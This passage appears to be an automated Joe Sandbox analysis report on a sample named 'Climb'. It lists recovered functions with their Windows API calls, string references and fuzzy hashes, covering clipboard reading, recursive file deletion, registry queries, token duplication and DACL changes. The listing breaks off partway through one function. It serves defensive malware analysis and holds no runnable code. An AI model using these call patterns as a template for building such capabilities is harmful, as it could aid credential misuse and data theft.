__fread_nolock.LIBCMT ref: 000B6868

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
Instruction ID: 2ee723b4fcfe77a4e42e62a63053b96c8ba4bd1f459cb34b850b1c991d3658f1
Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
Instruction Fuzzy Hash: 5BF0F87550020DFFDF05DF90C941EAE7BB9FB04318F208545F9159A251C336EA21ABA1

Function 000B3907 Relevance: 1.5, APIs: 1, Instructions: 24windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000002,?), ref: 000B3963

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 66ceb5cdcbfd28a9bae8e406f5d2025ee9674d349c4703b1c1ead35f25cdeb5e
Instruction ID: 6f63f5e1d0cc335e4ed436adfb2146f12a212c69bdd4ec8909659bd9c9715161
Opcode Fuzzy Hash: 66ceb5cdcbfd28a9bae8e406f5d2025ee9674d349c4703b1c1ead35f25cdeb5e
Instruction Fuzzy Hash: 93F037709143149FEB639F24EC467D57BFCB705708F0400A5E64496292D77457C8CF51

Function 000B3A57 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 000B3A76

Part of subcall function 000B8577: _wcslen.LIBCMT ref: 000B858A

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: c1a91fae158a0a226033f76a96e185aabc1d18c6715d8ef6cc4efb53c426562c
Instruction ID: 7f2ed8da58e5a9f6ff9d1efbb3ceed7d686b000ed49688c39839fed77350e592
Opcode Fuzzy Hash: c1a91fae158a0a226033f76a96e185aabc1d18c6715d8ef6cc4efb53c426562c
Instruction Fuzzy Hash: B3E0CD7690012457CB2193589C05FEA77DDDFC8790F044071FD05D7255DD60DDC0D690

Function 000F071A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000000,?,000F0A84,?,?,00000000,?,000F0A84,00000000,0000000C), ref: 000F0737

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: d5bb24faa98dc3e7966640d8c1ae7295f9afee37a842e517bc7ea2b0ac321340
Instruction ID: bd585032738f83acc2b1326c67f94bc9f2916be817691c2c3dc899c9fa2c3250
Opcode Fuzzy Hash: d5bb24faa98dc3e7966640d8c1ae7295f9afee37a842e517bc7ea2b0ac321340
Instruction Fuzzy Hash: 40D06C3200010DBBDF029F84ED06EDA3BAAFB48714F014000BE1856020C732E862AB90

Function 0011EAB0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,0011D840), ref: 0011EAB1

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 72ba8339dd94cf4a13110c9dcdc2d8f93b26b4feea26658e3398950ce34142d0
Instruction ID: 67de1a7731eb995b349f041878d378a4395ee33136c91a9a329442928a291da9
Opcode Fuzzy Hash: 72ba8339dd94cf4a13110c9dcdc2d8f93b26b4feea26658e3398950ce34142d0
Instruction Fuzzy Hash: FDB0926800060005AD2C0A787A099D933817D433A97DC1BD0E879874F1C37989AFA950

Function 0012664C Relevance: 1.3, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 0011DC54: FindFirstFileW.KERNEL32(?,?), ref: 0011DCCB
Part of subcall function 0011DC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 0011DD1B
Part of subcall function 0011DC54: FindNextFileW.KERNELBASE(00000000,00000010), ref: 0011DD2C
Part of subcall function 0011DC54: FindClose.KERNEL32(00000000), ref: 0011DD43

GetLastError.KERNEL32 ref: 0012666E

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: FileFind$CloseDeleteErrorFirstLastNext
String ID:
API String ID: 2191629493-0
Opcode ID: 8861561d150a605e2692448de191a59f4bcff48ed82f682fd17af1e777b6cafd
Instruction ID: 1784ba7bfb479c81808e04f5fe72d7a59fd601e73f11ec8938a2c3f99e77b727
Opcode Fuzzy Hash: 8861561d150a605e2692448de191a59f4bcff48ed82f682fd17af1e777b6cafd
Instruction Fuzzy Hash: 9EF08C367002108FCB14EF58E845BEEB7E9AF98360F048419F90A9B362CB70BC41CB90

Non-executed Functions

Function 00111B4D Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 00112010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0011205A
Part of subcall function 00112010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00112087
Part of subcall function 00112010: GetLastError.KERNEL32 ref: 00112097

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00111BD2
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00111BF4
CloseHandle.KERNEL32(?), ref: 00111C05
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00111C1D
GetProcessWindowStation.USER32 ref: 00111C36
SetProcessWindowStation.USER32(00000000), ref: 00111C40
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00111C5C

Part of subcall function 00111A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00111B48), ref: 00111A20
Part of subcall function 00111A0B: CloseHandle.KERNEL32(?,?,00111B48), ref: 00111A35

Strings

default, xrefs: 00111C57
, xrefs: 00111BA6
winsta0, xrefs: 00111C18

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0
API String ID: 22674027-1027155976
Opcode ID: abab380d6fc340d23c092a92556a816af364b2a08c30c05826b8c3d8cfd53b44
Instruction ID: 6bff818ed4c4e3929451e2ef76c114cddaecc5c082121e3e4423b5f134acb782
Opcode Fuzzy Hash: abab380d6fc340d23c092a92556a816af364b2a08c30c05826b8c3d8cfd53b44
Instruction Fuzzy Hash: 80818D75A00209BFDF159FA4EC49FEEBBB9FF09304F144129FA14A62A0D7718995CB60

Function 001114AE Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00111A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00111A60
Part of subcall function 00111A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,001114E7,?,?,?), ref: 00111A6C
Part of subcall function 00111A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,001114E7,?,?,?), ref: 00111A7B
Part of subcall function 00111A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,001114E7,?,?,?), ref: 00111A82
Part of subcall function 00111A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00111A99

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00111518
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0011154C
GetLengthSid.ADVAPI32(?), ref: 00111563
GetAce.ADVAPI32(?,00000000,?), ref: 0011159D
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 001115B9
GetLengthSid.ADVAPI32(?), ref: 001115D0
GetProcessHeap.KERNEL32(00000008,00000008), ref: 001115D8
HeapAlloc.KERNEL32(00000000), ref: 001115DF
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00111600
CopySid.ADVAPI32(00000000), ref: 00111607
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00111636
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00111658
SetUserObjectSecurity.USER32(?,00000004,?), ref: 0011166A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00111691
HeapFree.KERNEL32(00000000), ref: 00111698
GetProcessHeap.KERNEL32(00000000,00000000), ref: 001116A1
HeapFree.KERNEL32(00000000), ref: 001116A8
GetProcessHeap.KERNEL32(00000000,00000000), ref: 001116B1
HeapFree.KERNEL32(00000000), ref: 001116B8
GetProcessHeap.KERNEL32(00000000,?), ref: 001116C4
HeapFree.KERNEL32(00000000), ref: 001116CB

Part of subcall function 00111ADF: GetProcessHeap.KERNEL32(00000008,001114FD,?,00000000,?,001114FD,?), ref: 00111AED
Part of subcall function 00111ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,001114FD,?), ref: 00111AF4
Part of subcall function 00111ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,001114FD,?), ref: 00111B03

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 9cfeece697754cacb15294c2c541228b287c591a9c77a5ff070bc48a9cb6574f
Instruction ID: d23e0db91b08477224d76b781635f16a1528b77ec888ec3f457449f7c4d1e9e1
Opcode Fuzzy Hash: 9cfeece697754cacb15294c2c541228b287c591a9c77a5ff070bc48a9cb6574f
Instruction Fuzzy Hash: B0717BB6900209BBDF10DFA5EC44FEEBBB8BF05700F094525FA15A71A0D7719985CBA0

Function 0012F55C Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(0014DCD0), ref: 0012F586
IsClipboardFormatAvailable.USER32(0000000D), ref: 0012F594
GetClipboardData.USER32(0000000D), ref: 0012F5A0
CloseClipboard.USER32 ref: 0012F5AC
GlobalLock.KERNEL32(00000000), ref: 0012F5E4
CloseClipboard.USER32 ref: 0012F5EE
GlobalUnlock.KERNEL32(00000000), ref: 0012F619
IsClipboardFormatAvailable.USER32(00000001), ref: 0012F626
GetClipboardData.USER32(00000001), ref: 0012F62E
GlobalLock.KERNEL32(00000000), ref: 0012F63F
GlobalUnlock.KERNEL32(00000000), ref: 0012F67F
IsClipboardFormatAvailable.USER32(0000000F), ref: 0012F695
GetClipboardData.USER32(0000000F), ref: 0012F6A1
GlobalLock.KERNEL32(00000000), ref: 0012F6B2
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0012F6D4
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0012F6F1
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0012F72F
GlobalUnlock.KERNEL32(00000000), ref: 0012F750
CountClipboardFormats.USER32 ref: 0012F771
CloseClipboard.USER32 ref: 0012F7B6

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: 220f07ccb312a1a93f349e9ae7e2654db835f5d62b1e432a20d86c687464efbd
Instruction ID: 61470f29905db02efa81cb01724c1f683a931f51486e00534ad9a66bcb4f3ac8
Opcode Fuzzy Hash: 220f07ccb312a1a93f349e9ae7e2654db835f5d62b1e432a20d86c687464efbd
Instruction Fuzzy Hash: 0961AF35204201AFD700EF20E885FAABBB4EF85714F15457DF846876A2DB71ED86CB62

Function 001273D4 Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00127403
FindClose.KERNEL32(00000000), ref: 00127457
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00127493
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 001274BA

Part of subcall function 000BB329: _wcslen.LIBCMT ref: 000BB333

FileTimeToSystemTime.KERNEL32(?,?), ref: 001274F7
FileTimeToSystemTime.KERNEL32(?,?), ref: 00127524

Strings

%03d, xrefs: 001277E7
%4d%02d%02d%02d%02d%02d%03d, xrefs: 00127577
%02d, xrefs: 00127645, 0012764F, 0012769F, 001276EF, 0012773F, 0012778F
%4d, xrefs: 001275F6
%4d%02d%02d%02d%02d%02d, xrefs: 001275AF

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: abf0e9102770f17242ee038e8ccf73863182b1450559b07778afb70bd92ffb19
Instruction ID: 9f819ba027a4881c07294ef00cd011214ffbb1f2adbc0e028f70e2a171481ef0
Opcode Fuzzy Hash: abf0e9102770f17242ee038e8ccf73863182b1450559b07778afb70bd92ffb19
Instruction Fuzzy Hash: 7BD15C72508344AFC700EB64C885EEBB7ECAF98704F44491DF589D6292EB74DA44CB62

Function 0012A087 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 0012A0A8
GetFileAttributesW.KERNEL32(?), ref: 0012A0E6
SetFileAttributesW.KERNEL32(?,?), ref: 0012A100
FindNextFileW.KERNEL32(00000000,?), ref: 0012A118
FindClose.KERNEL32(00000000), ref: 0012A123
FindFirstFileW.KERNEL32(*.*,?), ref: 0012A13F
SetCurrentDirectoryW.KERNEL32(?), ref: 0012A18F
SetCurrentDirectoryW.KERNEL32(00177B94), ref: 0012A1AD
FindNextFileW.KERNEL32(00000000,00000010), ref: 0012A1B7
FindClose.KERNEL32(00000000), ref: 0012A1C4
FindClose.KERNEL32(00000000), ref: 0012A1D4

Strings

*.*, xrefs: 0012A13A

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: ee28a475ea1cd9e9b427e5e7a7265ab463a293ffc7a964cb8cc340f08dd8487e
Instruction ID: c5690eb6f2f94ead546846085cebb4abaf7c930959309e2a73a9d4addf1618be
Opcode Fuzzy Hash: ee28a475ea1cd9e9b427e5e7a7265ab463a293ffc7a964cb8cc340f08dd8487e
Instruction Fuzzy Hash: E831F3726006296BDF10AFB4FC49EDE73ADAF05330F404195E814E31A0EB70DEA48A65

Function 00124763 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00124785
_wcslen.LIBCMT ref: 001247B2
CreateDirectoryW.KERNEL32(?,00000000), ref: 001247E2
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00124803
RemoveDirectoryW.KERNEL32(?), ref: 00124813
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0012489A
CloseHandle.KERNEL32(00000000), ref: 001248A5
CloseHandle.KERNEL32(00000000), ref: 001248B0

Strings

\??\%s, xrefs: 001247A0
:, xrefs: 001247C7
\, xrefs: 001247BC

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
String ID: :$\$\??\%s
API String ID: 1149970189-3457252023
Opcode ID: 4d014bd50ebf838cc77fb60dae115055463e4b0a72c4567dbc9494cedfa5ef8e
Instruction ID: 11a8e4123cda057939705c68c50e0866e26a30ee450d6104d11039ac58c6b833
Opcode Fuzzy Hash: 4d014bd50ebf838cc77fb60dae115055463e4b0a72c4567dbc9494cedfa5ef8e
Instruction Fuzzy Hash: F831C4B5910259ABDF219FA0EC49FEF37BCEF89700F1041B6F509D2161E77096948B24

Function 0012A1E2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 0012A203
FindNextFileW.KERNEL32(00000000,?), ref: 0012A25E
FindClose.KERNEL32(00000000), ref: 0012A269
FindFirstFileW.KERNEL32(*.*,?), ref: 0012A285
SetCurrentDirectoryW.KERNEL32(?), ref: 0012A2D5
SetCurrentDirectoryW.KERNEL32(00177B94), ref: 0012A2F3
FindNextFileW.KERNEL32(00000000,00000010), ref: 0012A2FD
FindClose.KERNEL32(00000000), ref: 0012A30A
FindClose.KERNEL32(00000000), ref: 0012A31A

Part of subcall function 0011E399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0011E3B4

Strings

*.*, xrefs: 0012A280

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: e97a7cedb9c98a7f44723b9b953f912a2f1288f9b443a6694d6c1dd1e355abcc
Instruction ID: ef7baccdf7b13c2733d86e7a40a365764d5a82f234c7b5f6d08b6a25e07e12d5
Opcode Fuzzy Hash: e97a7cedb9c98a7f44723b9b953f912a2f1288f9b443a6694d6c1dd1e355abcc
Instruction Fuzzy Hash: E731337250062AAFCF20EFA4FC49EDE77ADAF45320F504195E814E31A0DB71DE95CA61

Function 0013C8A4 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0013D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0013C10E,?,?), ref: 0013D415
Part of subcall function 0013D3F8: _wcslen.LIBCMT ref: 0013D451
Part of subcall function 0013D3F8: _wcslen.LIBCMT ref: 0013D4C8
Part of subcall function 0013D3F8: _wcslen.LIBCMT ref: 0013D4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0013C99E
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 0013CA09
RegCloseKey.ADVAPI32(00000000), ref: 0013CA2D
RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0013CA8C
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0013CB47
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0013CBB4
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0013CC49
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 0013CC9A
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0013CD43
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0013CDE2
RegCloseKey.ADVAPI32(00000000), ref: 0013CDEF

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
String ID:
API String ID: 3102970594-0
Opcode ID: cefc6d4ae1a0ed324186d2b9fc9bf09abba7c416dbca0ad8d1f145c023eee6e2
Instruction ID: eec7623d60a2e62c1dcce54231d8af6b6e396e00b224cdb8e86b0ad0f48aeab4
Opcode Fuzzy Hash: cefc6d4ae1a0ed324186d2b9fc9bf09abba7c416dbca0ad8d1f145c023eee6e2
Instruction Fuzzy Hash: 250261716042009FC714DF28C895E6ABBE5FF89314F19849DF849DB2A2DB31ED46CB91

Function 0011D921 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 000B5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000B55D1,?,?,000F4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 000B5871

Part of subcall function 0011EAB0: GetFileAttributesW.KERNEL32(?,0011D840), ref: 0011EAB1

FindFirstFileW.KERNEL32(?,?), ref: 0011D9CD
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0011DA88
